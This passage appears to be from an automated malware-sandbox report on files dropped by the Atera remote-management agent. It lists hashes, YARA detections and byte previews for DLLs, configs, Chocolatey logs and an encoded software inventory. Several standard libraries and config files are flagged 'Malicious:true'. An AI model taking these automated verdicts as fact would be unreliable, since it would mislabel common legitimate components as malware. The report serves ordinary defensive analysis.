                                                                                                                                                                                                                                        SHA1:34367ACE1A01B9A1651FC2D786BC1DB32DCC84BB
                                                                                                                                                                                                                                        SHA-256:455B74FB7473EF4430101FF9E0153FA18314169C4C6BA308ACCFAEFDB0A20813
                                                                                                                                                                                                                                        SHA-512:B1E3934EF308654DCDAA15D91D30CED737CE8C95A36B5DEDDE4C92A9AEFEDB8E030100052181CFEFF01E95A0487AD6B2D6F54E66EFB18B5E3826D86FDD628A7D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ..............................v.....@..................................U..O....`..,............B..0(........................................................... ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2726754
                                                                                                                                                                                                                                        Entropy (8bit):7.999925670485869
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:zF3WpEHlv0gZy1QXPfME8e6S+DYhVB0JT+fYiLdr53rMCAaq0qYmT:JWWFv3Zyqffhb+Dx9ilpM7a6lT
                                                                                                                                                                                                                                        MD5:61CC7ACFF5BC3AC89753484346B067F9
                                                                                                                                                                                                                                        SHA1:074D7EB031396E6D58405054CFC7BC1F4A9F6894
                                                                                                                                                                                                                                        SHA-256:B4D2703AFD0180503CF495D69A8B4452EF864F061B4C760DEFEAAD7AE777FF27
                                                                                                                                                                                                                                        SHA-512:DAB984DDED857DFC7890F9F98D22BC7EEB85E1B6297BD84FE2326198AB59F35B709B97B0CC49243413F35CC9EE8FC65B1C9447DADAD001ECD40FF5F2E457EA97
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......m2Yv.2?........?...AgentPackageProgramManagement/AgentPackageProgramManagement.exe....0........l......K}....)-.(`.VM2..../...<k.s...0..o.55..H!4.i.....X.Q.9.....y"[3.S\.AE9y.8THys..6......q9^..>%6OA(...#a1LQ$.~._.Aeh.+.e6..:...T.e.:U@tg*.P.^.{.......TZ.CNq'Jw...*.b...g....b.To....;...........'.z...-.V..8".....*.o......,..2.....H.>).... s......t...._{(.B.xJ+...;d.....EsT.....sjcl...udN.:p.@.[.aHZ._.".qN.R......Jm..T.Q9e.[.5YCkC...k.V'{v&.Z..*.S.zE..:u....NhSD..s....b..q...}a....eL.Lg..3..7v3.pK.pv.._gRD.{8..<x.m.w.&....Y..3...kU.Es.}...7...N.n..$.........."t9.....o...N..h.{gh.+h....._.`..a."...z.,:=W..t<....s{.x.6..........2..<..}."..@.q..>.p.Rx.v."Q......q.KP....*t.?.(.V.u..y.3..9|.....R....O.........R.......-.R..3..]].Y..fB.(.!v...V.:.5V.11....W.s0..!.'...#...OL.=.4@Jo../.j=.....LW .}...>.#.... ..M.O=.S..o.,.2..9.(..Q.].c..........|..x...y...yW.....i.,.:..8....t?................u3..&.r.l..Dq.RsB.*.-..6aa..1yy.O>.(......_../uH.N.;...?.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55856
                                                                                                                                                                                                                                        Entropy (8bit):6.199458600254432
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:2lEOJ1UHxhj7UenAVe79k7Rm7Bl77HxPp4:2lEOJ18j4enAsZARsr7lp4
                                                                                                                                                                                                                                        MD5:E32856BEF4126DF5FB008E0EC9E7A3DD
                                                                                                                                                                                                                                        SHA1:FD80C9EC6CD3D1D2CCA526CA6B21B406D166495C
                                                                                                                                                                                                                                        SHA-256:8B397E29048F63589CDD028F732468F17684F5B0051752C73F1C240B76392D48
                                                                                                                                                                                                                                        SHA-512:E904F65282A579E50DED632B0EA8A783FFE3D1687FE27D4AA82BF5B44993D23F4C038C3B60CECB00AEE4D05624B894F87595988883467B70C3CDE37C77626C0A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..f.........."...0.................. ........@.. ..............................Y.....`.....................................O.......................0(..........l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........P..ph...........................................................~....(....-..*.(....,..*(....~....(....(.....l(....(....*...0..3.......~....(....-.(...+*~....(.....(.....(....o....(...+*..0...........(.....~.....( ...*..0...........(.....~.....( ...*..0...........(....(......(!...*2.(....(....*v~....(....-.~"...*~....(....*...0...........(#....(.....o$...(%...*.0..g.......(&....('....o$......o(....s).......+......L...r...p(*...o+...&...X......i2..o,...o-........,..o.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                                                                                        Entropy (8bit):5.037356665456624
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VYF9LNFF7ap+58hOf/2//3QOFip+5v5OXrRf/2//FicYo4xT:JdszvPF7N8OH2//3dVhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:336CAA70D9EF388EDF8B234E5FC40CEE
                                                                                                                                                                                                                                        SHA1:864CCB7643FC99313E5ACBEB59D608CD179E01BB
                                                                                                                                                                                                                                        SHA-256:9BB07566C5CEAF46CFC1164A63553BB3C00AD8A04138211C6EBA81B60F4FE355
                                                                                                                                                                                                                                        SHA-512:EB037FF55C7D61A4170A9143B7BA40CC43DDBC9E8DF673D7AF03548C27C4410F53A5CDFAFE8942559B9E5061419512F3C8FAA5A6D32ED147DD33F832CF43E637
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXRLc:WBRo
                                                                                                                                                                                                                                        MD5:6ABCEAE033B83A5035C535EC04A49AEF
                                                                                                                                                                                                                                        SHA1:DBE39A40FAFB5C1BB855E44B63283C8E76138469
                                                                                                                                                                                                                                        SHA-256:05D2DDB7C93FE7DA11090E743DB751374096BA8932439B7E78568695D5CCE60E
                                                                                                                                                                                                                                        SHA-512:7A6DEC40D772CF313C0A4969D5D970E1B059C21D42578C2DE734396AE76382E6CC21A986AD31810847AC41F61D081C41468F3E7EE4736A6163E59CA24DECD8D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=24.9

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.18082685423375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:NJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJd/50vks00UfafgVU7HxLr:NQUm2H5KTfOLgxFJj550vksVUfhVUhr
                                                                                                                                                                                                                                        MD5:FFE10928C552F5A216D1A361B89BB1BC
                                                                                                                                                                                                                                        SHA1:9524CEEA59E85C6782949B02578176FCE0492D27
                                                                                                                                                                                                                                        SHA-256:C715F651479984383812AF42F6A8482CF90E277F21DF07CEAB9BB3F6775CDD8E
                                                                                                                                                                                                                                        SHA-512:FF66A15F8ABE8B42C997ADAD8707083DFC8451A088FDA8641792A21AED40E9F5B079710A6F54EA73866DF084E8BB9696454897E78A8845E7FD9ACCFE9F3BB48D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..0..H..........zf... ........... ....................................`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):670
                                                                                                                                                                                                                                        Entropy (8bit):4.870186870231866
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5lh3rwhI4IaMFj27/tUYCQpU0E+dqo6rHQknd77psLlO:l334IaJUuU0E+QHQk17psLlO
                                                                                                                                                                                                                                        MD5:B4ECFC2FF4822CE40435ADA0A02D4EC5
                                                                                                                                                                                                                                        SHA1:8AAF3F290D08011ADE263F8A3AB4FE08ECDE2B64
                                                                                                                                                                                                                                        SHA-256:A42AC97C0186E34BDC5F5A7D87D00A424754592F0EC80B522A872D630C1E870A
                                                                                                                                                                                                                                        SHA-512:EAFAC709BE29D5730CB4ECD16E1C9C281F399492C183D05CC5093D3853CDA7570E6B9385FBC80A40FF960B5A53DAE6AE1F01FC218E60234F7ADCED6DCCBD6A43
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview: Copyright (c) 2017 Chocolatey Software, Inc... Copyright (c) 2011 - 2017 RealDimensions Software, LLC.... Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.... http://www.apache.org/licenses/LICENSE-2.0.... Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for the specific language governing permissions and.. limitations under the License.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960396533079377
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU5:+BA/ZTvQD0XY0AJBSjRlXP36RMGU
                                                                                                                                                                                                                                        MD5:64BDDA183FE85175CA37B96EA3BFAD74
                                                                                                                                                                                                                                        SHA1:8A452E576174C432D4E8A3AF98FF424BDD76B924
                                                                                                                                                                                                                                        SHA-256:BCAC436A62C9728B03B1812F09AC14A2128E030BF7FFEEA14A1784603BED0885
                                                                                                                                                                                                                                        SHA-512:DF75C7D39C38DB9D60FB450FFCAD002B173B773F755E692BB29B07BFD3C43DCC893BD5E86038778697B182F28B27E51BDDB69932D5C11684ECECB735BC4A264D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......{....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50224
                                                                                                                                                                                                                                        Entropy (8bit):6.218030250172801
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:nSrEZvG2rO1/ovmVLmAY23MrQ8lJkBnCMbTKEpYinAMxCf:KsG2KBVLFOzliBnBr7HxY
                                                                                                                                                                                                                                        MD5:6229504CC37B9624A68C37B43A1C608C
                                                                                                                                                                                                                                        SHA1:B8DDB5CD1D0A0B910BB6892BEAF824AFC09E938B
                                                                                                                                                                                                                                        SHA-256:62E577D151A2287A7CED56735B40F4AEFBBBC070E07DF5DA3D126F72EC309276
                                                                                                                                                                                                                                        SHA-512:46EB7B3B77E309C25016F0F8D49CBAB601B2E86131699870410308BC3F20F6B0D8FEC145C0AE2A7F66F590385BD1C1EBF70A1F4896CD7C1E9ED94ABD5E652BC9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r............" ..0.................. ........... ....................................`.....................................O.......................0(..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......@K...f............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..(....*..{....*"..}....*..{

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):662
                                                                                                                                                                                                                                        Entropy (8bit):4.952846219984862
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGzNFF7ap+58hOf/2//3QOFip+5v5OXrRf/2//FicYo4xT:2duPF7N8OH2//3dVhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:0F638DECEBA5011AF737C29E90C20F6A
                                                                                                                                                                                                                                        SHA1:1484B6084C8231231C7C472A57E6835B4A3EA146
                                                                                                                                                                                                                                        SHA-256:B50494F0DDF2AC7DCFB74BAE526E74F67FF501AD0CD5B712834829DAD9563368
                                                                                                                                                                                                                                        SHA-512:0E26D3AD25DE0FD761D4F15E714AA136C19427AA02469BE8A1D0CE639FFC398E798BA30F19DBC77C8A231FC1B849D07A88C2BDC797C9D191847663F15ECA2917
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\cachedSoftware.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3764), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3764
                                                                                                                                                                                                                                        Entropy (8bit):5.620769202269081
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:HECI98IbI5anGIrKJ4f6/ShIdg+yuYqlUQp1YilXTeMjIR:HEC088I5anGF86/ShIg+yuYqlJXYE7U
                                                                                                                                                                                                                                        MD5:FC7A5AB8C8A580D3EEF4FE04C8C901F6
                                                                                                                                                                                                                                        SHA1:E5563B05D72245FE1FDD0F2AAEF5712B388C8569
                                                                                                                                                                                                                                        SHA-256:84AF00AA0E696CABA78EF4CF9C8975CA8DB5572A604D1291A964FCB68E00CFC1
                                                                                                                                                                                                                                        SHA-512:82ACE3069E19406C6546D4712BA990519E1F692CCC063E928E18C8E55608301B034047FDCCC90A81C871FC0A0CA78C12826B7B269E5AEBA455AA940910B8BF71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:W3siUmVtb3ZlYWJsZSI6dHJ1ZSwiTmFtZSI6IjctWmlwICAoeDY0KSIsIlZlcnNpb24iOiIyMy4wMSIsIkluc3RhbGxlZE9uIjoiMjAyMy0xMC0wM1QwNjo1MToyOC40NTUzNDczLTA0OjAwIiwiUHVibGlzaGVyIjoiSWdvciBQYXZsb3YiLCJTaXplSW5CeXRlcyI6NTc4OTY5NiwiQXZhaWxhYmxlVmVyc2lvbiI6bnVsbCwiU3RhdHVzIjoiSW5zdGFsbGVkIiwiVGhpcmRQYXJ0eU5hbWUiOm51bGx9LHsiUmVtb3ZlYWJsZSI6dHJ1ZSwiTmFtZSI6IkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkiLCJWZXJzaW9uIjoiMjMuMDA2LjIwMzIwIiwiSW5zdGFsbGVkT24iOiIyMDIzLTEwLTAzVDAwOjAwOjAwIiwiUHVibGlzaGVyIjoiQWRvYmUiLCJTaXplSW5CeXRlcyI6NjI2NzQ1MzQ0LCJBdmFpbGFibGVWZXJzaW9uIjpudWxsLCJTdGF0dXMiOiJJbnN0YWxsZWQiLCJUaGlyZFBhcnR5TmFtZSI6bnVsbH0seyJSZW1vdmVhYmxlIjpmYWxzZSwiTmFtZSI6IkF0ZXJhQWdlbnQiLCJWZXJzaW9uIjoiMS44LjcuMiIsIkluc3RhbGxlZE9uIjoiMjAyNC0wMi0yOFQwOTo1MjowNC0wNTowMCIsIlB1Ymxpc2hlciI6IkF0ZXJhIG5ldHdvcmtzIiwiU2l6ZUluQnl0ZXMiOjQ5MjAwNDgsIkF2YWlsYWJsZVZlcnNpb24iOm51bGwsIlN0YXR1cyI6Ikluc3RhbGxlZCIsIlRoaXJkUGFydHlOYW1lIjpudWxsfSx7IlJlbW92ZWFibGUiOmZhbHNlLCJOYW1lIjoiR29vZ2xlIENocm9tZSIsIlZlcnNpb24iOiIxMTcuMC41OTM4LjEzNCIsIkluc3RhbGxl

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_36-log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301
                                                                                                                                                                                                                                        Entropy (8bit):4.898878940140915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRQQgb5kBm7ObCDL7fsDPV7gRvgOBLy:pem717f8PV7UQQ6em717f8PV7Up9y
                                                                                                                                                                                                                                        MD5:F5ADB4BF688F888451346501914E801D
                                                                                                                                                                                                                                        SHA1:B7103D27E3A34C5EA878D342FEE1C317234274A7
                                                                                                                                                                                                                                        SHA-256:D3524D2EEFAD5EDD967349655A68F23475D7C78B5BD97731AAF7AB353F277245
                                                                                                                                                                                                                                        SHA-512:4B517B4260D8F67443E5B581AD4AC07EF819C46B7B2504ADA75E26049D09176548E30CD469501ABC9CA35F1FA62B6FB2FBE218F39A4D85D786F511BE39A5EE2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_36-log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Enabled allowGlobalConfirmation..Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...0 packages installed...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_47-log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):411
                                                                                                                                                                                                                                        Entropy (8bit):4.870031447117875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRoUvlwTS7v33LQ7mLLlGKACCWOKE2y7/oqAyhs9KF8J:pem717f8PV7UO+fo6BNVy/5XF8dIk
                                                                                                                                                                                                                                        MD5:CBC72DCD51D6F1A3123ABBA5169B79A8
                                                                                                                                                                                                                                        SHA1:8F16793BD8E55C7C881C5D9955170227790DE36A
                                                                                                                                                                                                                                        SHA-256:432BE74F2EF336472CD63F935CA96F9B41BD87B90DE93A8FA24F22274D9C0235
                                                                                                                                                                                                                                        SHA-512:139F087434FA794A34FAA04EA240BBCADAEF1655EEAA4F9E4E3DC4B331FEC64ECBD9B6314C602CCFD194A656ACC1BFE615D12DAECA31F6B51F8748616F2EC132
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_47-log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Outdated Packages.. Output is package name | current version | available version | pinned?......Chocolatey has determined 0 package(s) are outdated. ....Enjoy using Chocolatey? Explore more amazing features to take your..experience to the next level at.. https://chocolatey.org/compare..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6655024
                                                                                                                                                                                                                                        Entropy (8bit):6.267134407332975
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:VCMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIw2:NlV1qKpkfqbjeGVr4NHYJ60B2
                                                                                                                                                                                                                                        MD5:28C1E670C16BDE257B6780D8EE26AB31
                                                                                                                                                                                                                                        SHA1:9786EC0C1730ED673A6CAB422E40529FDE6803EA
                                                                                                                                                                                                                                        SHA-256:A06F93EBB0C1E91286060B3CD63A166B72D4D4E6727D03A49B17538B22CE8074
                                                                                                                                                                                                                                        SHA-512:2AAAE6C2AB5F4857BF12EB24E126744A84F6C4C04F2AE1ED5348523E6F499E2BCF8A3D8BC4F99C7CD9E78CE1D8249C0F6EE094A626029A4BBC170F5C4902A27F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
